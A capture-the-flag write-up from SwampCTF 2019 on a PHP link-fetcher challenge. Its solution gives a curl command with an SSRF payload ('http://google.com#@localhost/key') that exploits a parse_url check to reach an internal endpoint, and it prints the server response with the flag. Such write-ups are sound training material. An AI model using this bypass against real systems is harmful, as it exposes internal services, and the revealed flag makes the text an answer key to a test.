Tags: swampctf2019
Rating:
### Problem Description
It's the year 1997 and the Internet is just heating up! :fire:
In order to get ahead of the curve, SIT Industries® has introduced it's first Internet product: The Link Saver™. SIT Industries® has been very secretive about this product - even going so far to hire Kernel Sanders® to test the security!
However, The Kernel discovered that The Link Saver had a little bit of an SSRF problem that allowed any user to fetch the code for The Link Saver™ from https://localhost/key and host it themselves :grimacing:. Fortunately, with a lil' parse_url magic, SIT Industries® PHP wizards have patched this finding from Kernel Sanders® and are keeping the code behind this wonderful site secure!
... or have they? :wink:
-= Created by andrewjkerr =-
- - - -
### Solution
After connecting to the [website](http://chal1.swampctf.com:1244/) of the challenge, we obtain the following page:
There was an input field in the page allowing us to send a request to the URL we wanted.
After some tries I noticed that the only accepted URL was _www.google.com_. Taking this into account, I tried injecting _http://google.com#@localhost/key_.
```
$ curl http://chal1.swampctf.com:1244/ --data="link=http://google.com#@localhost/key"
<html>
<head>
<title>Link Fetcher</title>
</head>
<body>
<h1>The Link Fetcher</h1>
Want to remember cool links? This link fetcher will fetch links and store them for you!
Link added!
Link: http://google.com#@localhost/key
Title: The flag!
Description: flag{y0u_cANn0t_TRU5t_php}
<hr /></body>
